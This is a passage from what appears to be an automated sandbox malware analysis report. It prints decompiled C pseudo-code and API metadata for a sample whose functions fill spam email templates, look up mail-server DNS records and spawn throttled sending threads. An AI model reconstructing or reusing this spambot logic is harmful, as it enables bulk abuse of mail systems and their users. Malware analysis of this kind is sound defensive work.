				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                                                                  0x0040b3e1
                                                                                                                                  0x0040b3ef
                                                                                                                                  0x0040b3ff
                                                                                                                                  0x0040b40f
                                                                                                                                  0x0040b411
                                                                                                                                  0x0040b414
                                                                                                                                  0x0040b416
                                                                                                                                  0x0040b41a
                                                                                                                                  0x0040b426
                                                                                                                                  0x0040b439
                                                                                                                                  0x0040b43b
                                                                                                                                  0x0040b440
                                                                                                                                  0x0040b440
                                                                                                                                  0x0040b443
                                                                                                                                  0x0040b453
                                                                                                                                  0x0040b467
                                                                                                                                  0x0040b47b
                                                                                                                                  0x0040b485
                                                                                                                                  0x0040b48e
                                                                                                                                  0x0040b49a
                                                                                                                                  0x0040b49f
                                                                                                                                  0x0040b4a3
                                                                                                                                  0x0040b4a4
                                                                                                                                  0x0040b4a5
                                                                                                                                  0x0040b4b6
                                                                                                                                  0x0040b4bb
                                                                                                                                  0x0040b4bc
                                                                                                                                  0x0040b4c7
                                                                                                                                  0x0040b4d8
                                                                                                                                  0x0040b4e7
                                                                                                                                  0x0040b4f8
                                                                                                                                  0x0040b504
                                                                                                                                  0x0040b515
                                                                                                                                  0x0040b51e
                                                                                                                                  0x0040b52b
                                                                                                                                  0x0040b534

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040B467
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$wsprintf
                                                                                                                                  • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                                                                  • API String ID: 1220175532-2340906255
                                                                                                                                  • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                                                                  • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040C2DC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 182threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                                                                  0x0040c2dc
                                                                                                                                  0x0040c2de
                                                                                                                                  0x0040c2e4
                                                                                                                                  0x0040c2e9
                                                                                                                                  0x0040c2ef
                                                                                                                                  0x0040c482
                                                                                                                                  0x0040c485
                                                                                                                                  0x0040c488
                                                                                                                                  0x0040c48b
                                                                                                                                  0x0040c48e
                                                                                                                                  0x0040c491
                                                                                                                                  0x0040c494
                                                                                                                                  0x0040c497
                                                                                                                                  0x0040c499
                                                                                                                                  0x0040c499
                                                                                                                                  0x0040c4a0
                                                                                                                                  0x0040c4a3
                                                                                                                                  0x0040c4a6
                                                                                                                                  0x0040c4a9
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4c1
                                                                                                                                  0x0040c4c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c4cc
                                                                                                                                  0x0040c2fe
                                                                                                                                  0x0040c326
                                                                                                                                  0x0040c329
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c342
                                                                                                                                  0x0040c345
                                                                                                                                  0x0040c348
                                                                                                                                  0x0040c348
                                                                                                                                  0x0040c34e
                                                                                                                                  0x0040c351
                                                                                                                                  0x0040c354
                                                                                                                                  0x0040c357
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c357
                                                                                                                                  0x0040c32b
                                                                                                                                  0x0040c32d
                                                                                                                                  0x0040c330
                                                                                                                                  0x0040c335
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c30b
                                                                                                                                  0x0040c316
                                                                                                                                  0x0040c319
                                                                                                                                  0x0040c31c
                                                                                                                                  0x0040c321
                                                                                                                                  0x0040c35a
                                                                                                                                  0x0040c35d
                                                                                                                                  0x0040c47a
                                                                                                                                  0x0040c47d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c47d
                                                                                                                                  0x0040c363
                                                                                                                                  0x0040c365
                                                                                                                                  0x0040c36d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c376
                                                                                                                                  0x0040c37f
                                                                                                                                  0x0040c378
                                                                                                                                  0x0040c378
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c384
                                                                                                                                  0x0040c389
                                                                                                                                  0x0040c38d
                                                                                                                                  0x0040c38d
                                                                                                                                  0x0040c395
                                                                                                                                  0x0040c397
                                                                                                                                  0x0040c397
                                                                                                                                  0x0040c399
                                                                                                                                  0x0040c39c
                                                                                                                                  0x0040c39c
                                                                                                                                  0x0040c39f
                                                                                                                                  0x0040c3ac
                                                                                                                                  0x0040c3ad
                                                                                                                                  0x0040c3b5
                                                                                                                                  0x0040c3b8
                                                                                                                                  0x0040c3bc
                                                                                                                                  0x0040c3bd
                                                                                                                                  0x0040c3c1
                                                                                                                                  0x0040c3c7
                                                                                                                                  0x0040c3c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c3cb
                                                                                                                                  0x0040c3d0
                                                                                                                                  0x0040c3d0
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c3c3
                                                                                                                                  0x0040c3c3
                                                                                                                                  0x0040c3d1
                                                                                                                                  0x0040c3d1
                                                                                                                                  0x0040c3d4
                                                                                                                                  0x0040c3d8
                                                                                                                                  0x0040c3da
                                                                                                                                  0x0040c3da
                                                                                                                                  0x0040c3e3
                                                                                                                                  0x0040c3eb
                                                                                                                                  0x0040c3f0
                                                                                                                                  0x0040c3f2
                                                                                                                                  0x0040c3f2
                                                                                                                                  0x0040c3fd
                                                                                                                                  0x0040c405
                                                                                                                                  0x0040c408
                                                                                                                                  0x0040c419
                                                                                                                                  0x0040c41a
                                                                                                                                  0x0040c41d
                                                                                                                                  0x0040c421
                                                                                                                                  0x0040c42a
                                                                                                                                  0x0040c42b
                                                                                                                                  0x0040c430
                                                                                                                                  0x0040c436
                                                                                                                                  0x0040c43b
                                                                                                                                  0x0040c443
                                                                                                                                  0x0040c448
                                                                                                                                  0x0040c44b
                                                                                                                                  0x0040c453
                                                                                                                                  0x0040c456
                                                                                                                                  0x0040c456
                                                                                                                                  0x0040c45c
                                                                                                                                  0x0040c46c
                                                                                                                                  0x0040c475
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c467
                                                                                                                                  0x0040c467
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c45c
                                                                                                                                  0x0040c3c1

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                                                                    • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C363
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C378
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                                                                  • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 1553760989-2166502722
                                                                                                                                  • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                                                                  • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                                                                  • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                                                                  • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                                                                  • Opcode Fuzzy Hash: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD3059 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 00AD3068
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00AD3078
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00410408), ref: 00AD3095
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00AD30B6
                                                                                                                                  • htons.WS2_32(00000035), ref: 00AD30EF
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00AD30FA
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00AD310D
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD314D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: iphlpapi.dll
                                                                                                                                  • API String ID: 2869546040-3565520932
                                                                                                                                  • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                                                                  • Instruction ID: f446a591f13b15a5e12a750fe2e1e871632597af3bfc36e1bcb32baddf06707e
                                                                                                                                  • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                                                                  • Instruction Fuzzy Hash: D831B833A00207ABDF119BB49C48AAE7778EF04761F144266F51AE7390DB74DE41CB55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D1B7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 241COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 532768033-2547889144
                                                                                                                                  • Opcode ID: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction ID: d0441a1c6b983311c903b277fb7f4aa63ae84449d50a9e317f732e81e7264bbf
                                                                                                                                  • Opcode Fuzzy Hash: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction Fuzzy Hash: 85A17EB0E012288BDF24DF55DC89BEEB7B0AB44305F6481DAE4197B281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0041500D Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __hextodec__inc__un_inc_isdigit_isxdigit
                                                                                                                                  • String ID: 8$F$o
                                                                                                                                  • API String ID: 245833041-550588462
                                                                                                                                  • Opcode ID: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction ID: 2e5843cf0efdca669e14db03ce57f9015b289e99c6720257502155bfede8526d
                                                                                                                                  • Opcode Fuzzy Hash: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction Fuzzy Hash: D4718FB0D05659DBCF25CF64C8943EEBB70AF95308F2481DBD8296B242D2799AC1CF49
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402D21 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                  			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}














                                                                                                                                  0x00402d31
                                                                                                                                  0x00402d32
                                                                                                                                  0x00402d33
                                                                                                                                  0x00402d39
                                                                                                                                  0x00402d3a
                                                                                                                                  0x00402d40
                                                                                                                                  0x00402d44
                                                                                                                                  0x00402d5b
                                                                                                                                  0x00402d61
                                                                                                                                  0x00402d69
                                                                                                                                  0x00402d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00402d54
                                                                                                                                  0x00402d6b
                                                                                                                                  0x00402d6c
                                                                                                                                  0x00402d6f
                                                                                                                                  0x00402d70
                                                                                                                                  0x00402d71
                                                                                                                                  0x00402d72
                                                                                                                                  0x00402d74
                                                                                                                                  0x00402d7b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402d7d
                                                                                                                                  0x00402d80
                                                                                                                                  0x00402d83
                                                                                                                                  0x00402d88
                                                                                                                                  0x00402deb
                                                                                                                                  0x00000000
                                                                                                                                  0x00402deb
                                                                                                                                  0x00402d90
                                                                                                                                  0x00402d95
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402da6
                                                                                                                                  0x00402daa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402db0
                                                                                                                                  0x00402db9
                                                                                                                                  0x00402dc1
                                                                                                                                  0x00402dc7
                                                                                                                                  0x00402dcb
                                                                                                                                  0x00402dd1
                                                                                                                                  0x00402dd4
                                                                                                                                  0x00402dd9
                                                                                                                                  0x00402de0
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de4
                                                                                                                                  0x00402de6
                                                                                                                                  0x00000000
                                                                                                                                  0x00402dea
                                                                                                                                  0x00402d4a
                                                                                                                                  0x00402d52
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                                                                  • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                  • API String ID: 3560063639-3847274415
                                                                                                                                  • Opcode ID: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                                                                  • Opcode Fuzzy Hash: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406CC9 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 84libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
